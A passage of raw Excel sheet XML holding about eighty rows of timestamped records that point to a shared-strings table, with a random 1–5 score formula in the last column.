      <c r="C6248" t="s">
        <v>41</v>
      </c>
      <c r="E6248" t="s">
        <v>5590</v>
      </c>
      <c r="F6248">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6249" s="1">
        <v>43440.495625000003</v>
      </c>
      <c r="C6249" t="s">
        <v>41</v>
      </c>
      <c r="F6249">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6250" s="1">
        <v>43440.485648148147</v>
      </c>
      <c r="C6250" t="s">
        <v>10</v>
      </c>
      <c r="D6250" t="s">
        <v>89</v>
      </c>
      <c r="E6250" t="s">
        <v>5591</v>
      </c>
      <c r="F6250">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6251" s="1">
        <v>43440.484930555554</v>
      </c>
      <c r="C6251" t="s">
        <v>10</v>
      </c>
      <c r="D6251" t="s">
        <v>263</v>
      </c>
      <c r="E6251" t="s">
        <v>5592</v>
      </c>
      <c r="F6251">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6252" s="1">
        <v>43440.479837962965</v>
      </c>
      <c r="C6252" t="s">
        <v>10</v>
      </c>
      <c r="D6252" t="s">
        <v>33</v>
      </c>
      <c r="F6252">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6253" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6253" s="1">
        <v>43440.470914351848</v>
      </c>
      <c r="C6253" t="s">
        <v>10</v>
      </c>
      <c r="D6253" t="s">
        <v>20</v>
      </c>
      <c r="E6253" s="2" t="s">
        <v>5593</v>
      </c>
      <c r="F6253">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6254" s="1">
        <v>43440.462442129632</v>
      </c>
      <c r="B6254" t="s">
        <v>1305</v>
      </c>
      <c r="C6254" t="s">
        <v>6</v>
      </c>
      <c r="D6254" t="s">
        <v>25</v>
      </c>
      <c r="E6254" t="s">
        <v>5594</v>
      </c>
      <c r="F6254">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6255" s="1">
        <v>43440.462314814817</v>
      </c>
      <c r="B6255" t="s">
        <v>35</v>
      </c>
      <c r="C6255" t="s">
        <v>6</v>
      </c>
      <c r="D6255" t="s">
        <v>25</v>
      </c>
      <c r="E6255" t="s">
        <v>5594</v>
      </c>
      <c r="F6255">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6256" s="1">
        <v>43440.462002314816</v>
      </c>
      <c r="B6256" t="s">
        <v>19</v>
      </c>
      <c r="C6256" t="s">
        <v>6</v>
      </c>
      <c r="D6256" t="s">
        <v>25</v>
      </c>
      <c r="E6256" t="s">
        <v>5594</v>
      </c>
      <c r="F6256">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6257" s="1">
        <v>43440.451562499999</v>
      </c>
      <c r="C6257" t="s">
        <v>10</v>
      </c>
      <c r="D6257" t="s">
        <v>158</v>
      </c>
      <c r="E6257" t="s">
        <v>5595</v>
      </c>
      <c r="F6257">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6258" s="1">
        <v>43440.449664351851</v>
      </c>
      <c r="C6258" t="s">
        <v>60</v>
      </c>
      <c r="F6258">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6259" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6259" s="1">
        <v>43440.447662037041</v>
      </c>
      <c r="C6259" t="s">
        <v>10</v>
      </c>
      <c r="D6259" t="s">
        <v>56</v>
      </c>
      <c r="E6259" s="2" t="s">
        <v>5596</v>
      </c>
      <c r="F6259">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6260" s="1">
        <v>43440.442928240744</v>
      </c>
      <c r="C6260" t="s">
        <v>10</v>
      </c>
      <c r="D6260" t="s">
        <v>667</v>
      </c>
      <c r="E6260" t="s">
        <v>5597</v>
      </c>
      <c r="F6260">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6261" s="1">
        <v>43440.433622685188</v>
      </c>
      <c r="C6261" t="s">
        <v>10</v>
      </c>
      <c r="D6261" t="s">
        <v>41</v>
      </c>
      <c r="E6261" t="s">
        <v>5598</v>
      </c>
      <c r="F6261">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6262" s="1">
        <v>43440.429629629631</v>
      </c>
      <c r="C6262" t="s">
        <v>10</v>
      </c>
      <c r="D6262" t="s">
        <v>33</v>
      </c>
      <c r="F6262">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6263" s="1">
        <v>43440.428124999999</v>
      </c>
      <c r="C6263" t="s">
        <v>10</v>
      </c>
      <c r="D6263" t="s">
        <v>33</v>
      </c>
      <c r="F6263">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6264" s="1">
        <v>43440.427291666667</v>
      </c>
      <c r="C6264" t="s">
        <v>10</v>
      </c>
      <c r="D6264" t="s">
        <v>33</v>
      </c>
      <c r="F6264">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6265" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6265" s="1">
        <v>43440.420011574075</v>
      </c>
      <c r="C6265" t="s">
        <v>65</v>
      </c>
      <c r="E6265" s="2" t="s">
        <v>5599</v>
      </c>
      <c r="F6265">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6266" s="1">
        <v>43440.414340277777</v>
      </c>
      <c r="C6266" t="s">
        <v>1931</v>
      </c>
      <c r="E6266" t="s">
        <v>5600</v>
      </c>
      <c r="F6266">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6267" s="1">
        <v>43440.408692129633</v>
      </c>
      <c r="C6267" t="s">
        <v>10</v>
      </c>
      <c r="D6267" t="s">
        <v>56</v>
      </c>
      <c r="E6267" t="s">
        <v>5601</v>
      </c>
      <c r="F6267">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6268" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6268" s="1">
        <v>43440.388935185183</v>
      </c>
      <c r="C6268" t="s">
        <v>48</v>
      </c>
      <c r="E6268" s="2" t="s">
        <v>5602</v>
      </c>
      <c r="F6268">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6269" s="1">
        <v>43440.380254629628</v>
      </c>
      <c r="C6269" t="s">
        <v>10</v>
      </c>
      <c r="D6269" t="s">
        <v>20</v>
      </c>
      <c r="E6269" t="s">
        <v>5603</v>
      </c>
      <c r="F6269">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6270" s="1">
        <v>43440.375081018516</v>
      </c>
      <c r="C6270" t="s">
        <v>1130</v>
      </c>
      <c r="E6270" t="s">
        <v>5604</v>
      </c>
      <c r="F6270">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6271" s="1">
        <v>43440.374525462961</v>
      </c>
      <c r="C6271" t="s">
        <v>1130</v>
      </c>
      <c r="F6271">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6272" s="1">
        <v>43440.362800925926</v>
      </c>
      <c r="C6272" t="s">
        <v>10</v>
      </c>
      <c r="D6272" t="s">
        <v>192</v>
      </c>
      <c r="E6272" t="s">
        <v>5605</v>
      </c>
      <c r="F6272">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6273" s="1">
        <v>43440.360902777778</v>
      </c>
      <c r="C6273" t="s">
        <v>60</v>
      </c>
      <c r="F6273">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6274" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6274" s="1">
        <v>43440.312476851854</v>
      </c>
      <c r="C6274" t="s">
        <v>10</v>
      </c>
      <c r="E6274" s="2" t="s">
        <v>5606</v>
      </c>
      <c r="F6274">
        <f t="shared" ref="F6274:F6337" ca="1" si="98">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="6275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6275" s="1">
        <v>43440.310497685183</v>
      </c>
      <c r="C6275" t="s">
        <v>60</v>
      </c>
      <c r="E6275">
        <v>604206608</v>
      </c>
      <c r="F6275">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6276" s="1">
        <v>43440.288842592592</v>
      </c>
      <c r="C6276" t="s">
        <v>60</v>
      </c>
      <c r="E6276" t="s">
        <v>5607</v>
      </c>
      <c r="F6276">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6277" s="1">
        <v>43440.283854166664</v>
      </c>
      <c r="C6277" t="s">
        <v>10</v>
      </c>
      <c r="D6277" t="s">
        <v>6</v>
      </c>
      <c r="E6277" t="s">
        <v>5608</v>
      </c>
      <c r="F6277">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6278" s="1">
        <v>43440.277986111112</v>
      </c>
      <c r="C6278" t="s">
        <v>41</v>
      </c>
      <c r="E6278" t="s">
        <v>5609</v>
      </c>
      <c r="F6278">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6279" s="1">
        <v>43440.259027777778</v>
      </c>
      <c r="C6279" t="s">
        <v>3097</v>
      </c>
      <c r="E6279" t="s">
        <v>5610</v>
      </c>
      <c r="F6279">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6280" s="1">
        <v>43440.247789351852</v>
      </c>
      <c r="C6280" t="s">
        <v>48</v>
      </c>
      <c r="E6280" t="s">
        <v>5611</v>
      </c>
      <c r="F6280">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6281" s="1">
        <v>43440.247395833336</v>
      </c>
      <c r="C6281" t="s">
        <v>559</v>
      </c>
      <c r="E6281" t="s">
        <v>5612</v>
      </c>
      <c r="F6281">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6282" s="1">
        <v>43440.235243055555</v>
      </c>
      <c r="C6282" t="s">
        <v>301</v>
      </c>
      <c r="F6282">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6283" s="1">
        <v>43440.235208333332</v>
      </c>
      <c r="C6283" t="s">
        <v>65</v>
      </c>
      <c r="E6283" t="s">
        <v>5613</v>
      </c>
      <c r="F6283">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6284" s="1">
        <v>43440.234861111108</v>
      </c>
      <c r="C6284" t="s">
        <v>60</v>
      </c>
      <c r="E6284" t="s">
        <v>5614</v>
      </c>
      <c r="F6284">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6285" s="1">
        <v>43440.225682870368</v>
      </c>
      <c r="C6285" t="s">
        <v>41</v>
      </c>
      <c r="E6285" t="s">
        <v>5615</v>
      </c>
      <c r="F6285">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6286" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6286" s="1">
        <v>43440.219247685185</v>
      </c>
      <c r="C6286" t="s">
        <v>71</v>
      </c>
      <c r="E6286" s="2" t="s">
        <v>5616</v>
      </c>
      <c r="F6286">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6287" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6287" s="1">
        <v>43440.173483796294</v>
      </c>
      <c r="C6287" t="s">
        <v>461</v>
      </c>
      <c r="E6287" s="2" t="s">
        <v>5617</v>
      </c>
      <c r="F6287">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6288" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6288" s="1">
        <v>43440.138784722221</v>
      </c>
      <c r="C6288" t="s">
        <v>41</v>
      </c>
      <c r="E6288" s="2" t="s">
        <v>5618</v>
      </c>
      <c r="F6288">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6289" s="1">
        <v>43440.137395833335</v>
      </c>
      <c r="C6289" t="s">
        <v>41</v>
      </c>
      <c r="E6289" t="s">
        <v>5619</v>
      </c>
      <c r="F6289">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6290" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6290" s="1">
        <v>43440.098032407404</v>
      </c>
      <c r="C6290" t="s">
        <v>73</v>
      </c>
      <c r="E6290" s="2" t="s">
        <v>5620</v>
      </c>
      <c r="F6290">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6291" s="1">
        <v>43440.019224537034</v>
      </c>
      <c r="C6291" t="s">
        <v>10</v>
      </c>
      <c r="D6291" t="s">
        <v>6</v>
      </c>
      <c r="F6291">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6292" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6292" s="1">
        <v>43439.999236111114</v>
      </c>
      <c r="C6292" t="s">
        <v>410</v>
      </c>
      <c r="E6292" s="2" t="s">
        <v>5621</v>
      </c>
      <c r="F6292">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6293" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6293" s="1">
        <v>43439.960949074077</v>
      </c>
      <c r="C6293" t="s">
        <v>410</v>
      </c>
      <c r="E6293" s="2" t="s">
        <v>5622</v>
      </c>
      <c r="F6293">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6294" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6294" s="1">
        <v>43439.958090277774</v>
      </c>
      <c r="C6294" t="s">
        <v>410</v>
      </c>
      <c r="E6294" s="2" t="s">
        <v>5621</v>
      </c>
      <c r="F6294">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6295" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6295" s="1">
        <v>43439.931354166663</v>
      </c>
      <c r="C6295" t="s">
        <v>139</v>
      </c>
      <c r="E6295" s="2" t="s">
        <v>5623</v>
      </c>
      <c r="F6295">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6296" s="1">
        <v>43439.909907407404</v>
      </c>
      <c r="C6296" t="s">
        <v>82</v>
      </c>
      <c r="E6296" t="s">
        <v>5624</v>
      </c>
      <c r="F6296">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6297" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6297" s="1">
        <v>43439.895509259259</v>
      </c>
      <c r="C6297" t="s">
        <v>454</v>
      </c>
      <c r="E6297" s="2" t="s">
        <v>5625</v>
      </c>
      <c r="F6297">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6298" s="1">
        <v>43439.840833333335</v>
      </c>
      <c r="C6298" t="s">
        <v>410</v>
      </c>
      <c r="E6298" t="s">
        <v>5626</v>
      </c>
      <c r="F6298">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6299" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6299" s="1">
        <v>43439.784421296295</v>
      </c>
      <c r="C6299" t="s">
        <v>260</v>
      </c>
      <c r="E6299" s="2" t="s">
        <v>5627</v>
      </c>
      <c r="F6299">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6300" s="1">
        <v>43439.753321759257</v>
      </c>
      <c r="C6300" t="s">
        <v>10</v>
      </c>
      <c r="D6300" t="s">
        <v>39</v>
      </c>
      <c r="E6300" t="s">
        <v>5628</v>
      </c>
      <c r="F6300">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6301" s="1">
        <v>43439.714479166665</v>
      </c>
      <c r="C6301" t="s">
        <v>10</v>
      </c>
      <c r="D6301" t="s">
        <v>92</v>
      </c>
      <c r="E6301" t="s">
        <v>5629</v>
      </c>
      <c r="F6301">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6302" s="1">
        <v>43439.709201388891</v>
      </c>
      <c r="C6302" t="s">
        <v>6</v>
      </c>
      <c r="D6302" t="s">
        <v>25</v>
      </c>
      <c r="E6302" t="s">
        <v>5630</v>
      </c>
      <c r="F6302">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6303" s="1">
        <v>43439.703784722224</v>
      </c>
      <c r="C6303" t="s">
        <v>10</v>
      </c>
      <c r="D6303" t="s">
        <v>36</v>
      </c>
      <c r="E6303" t="s">
        <v>5631</v>
      </c>
      <c r="F6303">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6304" s="1">
        <v>43439.695659722223</v>
      </c>
      <c r="C6304" t="s">
        <v>10</v>
      </c>
      <c r="D6304" t="s">
        <v>39</v>
      </c>
      <c r="E6304" t="s">
        <v>5632</v>
      </c>
      <c r="F6304">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6305" s="1">
        <v>43439.68346064815</v>
      </c>
      <c r="C6305" t="s">
        <v>10</v>
      </c>
      <c r="D6305" t="s">
        <v>11</v>
      </c>
      <c r="E6305" t="s">
        <v>5633</v>
      </c>
      <c r="F6305">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6306" s="1">
        <v>43439.679837962962</v>
      </c>
      <c r="C6306" t="s">
        <v>5634</v>
      </c>
      <c r="D6306" t="s">
        <v>17</v>
      </c>
      <c r="E6306" t="s">
        <v>4277</v>
      </c>
      <c r="F6306">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6307" s="1">
        <v>43439.671261574076</v>
      </c>
      <c r="C6307" t="s">
        <v>10</v>
      </c>
      <c r="D6307" t="s">
        <v>86</v>
      </c>
      <c r="E6307" t="s">
        <v>5635</v>
      </c>
      <c r="F6307">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6308" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6308" s="1">
        <v>43439.667395833334</v>
      </c>
      <c r="B6308" t="s">
        <v>5</v>
      </c>
      <c r="C6308" t="s">
        <v>6</v>
      </c>
      <c r="D6308" t="s">
        <v>25</v>
      </c>
      <c r="E6308" t="s">
        <v>5636</v>
      </c>
      <c r="F6308">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6309" s="1">
        <v>43439.662997685184</v>
      </c>
      <c r="C6309" t="s">
        <v>10</v>
      </c>
      <c r="D6309" t="s">
        <v>14</v>
      </c>
      <c r="E6309" t="s">
        <v>5637</v>
      </c>
      <c r="F6309">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6310" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6310" s="1">
        <v>43439.646597222221</v>
      </c>
      <c r="C6310" t="s">
        <v>10</v>
      </c>
      <c r="D6310" t="s">
        <v>163</v>
      </c>
      <c r="E6310" s="2" t="s">
        <v>5638</v>
      </c>
      <c r="F6310">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6311" s="1">
        <v>43439.606493055559</v>
      </c>
      <c r="C6311" t="s">
        <v>10</v>
      </c>
      <c r="D6311" t="s">
        <v>33</v>
      </c>
      <c r="F6311">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6312" s="1">
        <v>43439.578900462962</v>
      </c>
      <c r="C6312" t="s">
        <v>144</v>
      </c>
      <c r="E6312" t="s">
        <v>5639</v>
      </c>
      <c r="F6312">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6313" s="1">
        <v>43439.576539351852</v>
      </c>
      <c r="C6313" t="s">
        <v>10</v>
      </c>
      <c r="D6313" t="s">
        <v>263</v>
      </c>
      <c r="E6313" t="s">
        <v>5640</v>
      </c>
      <c r="F6313">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6314" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6314" s="1">
        <v>43439.570798611108</v>
      </c>
      <c r="C6314" t="s">
        <v>1510</v>
      </c>
      <c r="E6314" s="2" t="s">
        <v>5641</v>
      </c>
      <c r="F6314">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6315" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6315" s="1">
        <v>43439.54383101852</v>
      </c>
      <c r="C6315" t="s">
        <v>10</v>
      </c>
      <c r="D6315" t="s">
        <v>6</v>
      </c>
      <c r="E6315" s="2" t="s">
        <v>5642</v>
      </c>
      <c r="F6315">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6316" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6316" s="1">
        <v>43439.504537037035</v>
      </c>
      <c r="C6316" t="s">
        <v>50</v>
      </c>
      <c r="E6316" s="2" t="s">
        <v>5643</v>
      </c>
      <c r="F6316">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6317" s="1">
        <v>43439.489907407406</v>
      </c>
      <c r="C6317" t="s">
        <v>10</v>
      </c>
      <c r="D6317" t="s">
        <v>33</v>
      </c>
      <c r="F6317">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6318" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6318" s="1">
        <v>43439.488518518519</v>
      </c>
      <c r="C6318" t="s">
        <v>118</v>
      </c>
      <c r="E6318" s="2" t="s">
        <v>5644</v>
      </c>
      <c r="F6318">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6319" s="1">
        <v>43439.466851851852</v>
      </c>
      <c r="C6319" t="s">
        <v>10</v>
      </c>
      <c r="D6319" t="s">
        <v>151</v>
      </c>
      <c r="E6319" t="s">
        <v>5645</v>
      </c>
      <c r="F6319">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6320" s="1">
        <v>43439.466817129629</v>
      </c>
      <c r="C6320" t="s">
        <v>10</v>
      </c>
      <c r="D6320" t="s">
        <v>151</v>
      </c>
      <c r="E6320" t="s">
        <v>5645</v>
      </c>
      <c r="F6320">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6321" s="1">
        <v>43439.466770833336</v>
      </c>
      <c r="C6321" t="s">
        <v>10</v>
      </c>
      <c r="D6321" t="s">
        <v>151</v>
      </c>
      <c r="E6321" t="s">
        <v>5645</v>
      </c>
      <c r="F6321">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6322" s="1">
        <v>43439.452893518515</v>
      </c>
      <c r="C6322" t="s">
        <v>43</v>
      </c>
      <c r="F6322">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6323" s="1">
        <v>43439.448425925926</v>
      </c>
      <c r="C6323" t="s">
        <v>41</v>
      </c>
      <c r="E6323" t="s">
        <v>5646</v>
      </c>
      <c r="F6323">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6324" s="1">
        <v>43439.443379629629</v>
      </c>
      <c r="C6324" t="s">
        <v>6</v>
      </c>
      <c r="D6324" t="s">
        <v>194</v>
      </c>
      <c r="E6324" t="s">
        <v>5647</v>
      </c>
      <c r="F6324">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6325" s="1">
        <v>43439.434502314813</v>
      </c>
      <c r="C6325" t="s">
        <v>10</v>
      </c>
      <c r="D6325" t="s">
        <v>151</v>
      </c>
      <c r="E6325" t="s">
        <v>5648</v>
      </c>
      <c r="F6325">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6326" s="1">
        <v>43439.434282407405</v>
      </c>
      <c r="C6326" t="s">
        <v>48</v>
      </c>
      <c r="E6326" t="s">
        <v>5649</v>
      </c>
      <c r="F6326">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6327" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6327" s="1">
        <v>43439.432453703703</v>
      </c>
      <c r="C6327" t="s">
        <v>41</v>
      </c>
      <c r="E6327" s="2" t="s">
        <v>5650</v>
      </c>
      <c r="F6327">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6328" s="1">
        <v>43439.400787037041</v>
      </c>
      <c r="C6328" t="s">
        <v>10</v>
      </c>
      <c r="D6328" t="s">
        <v>158</v>
      </c>
      <c r="E6328" t="s">
        <v>5651</v>
      </c>
      <c r="F6328">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6329" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6329" s="1">
        <v>43439.379675925928</v>
      </c>
      <c r="C6329" t="s">
        <v>10</v>
      </c>
      <c r="D6329" t="s">
        <v>71</v>
      </c>
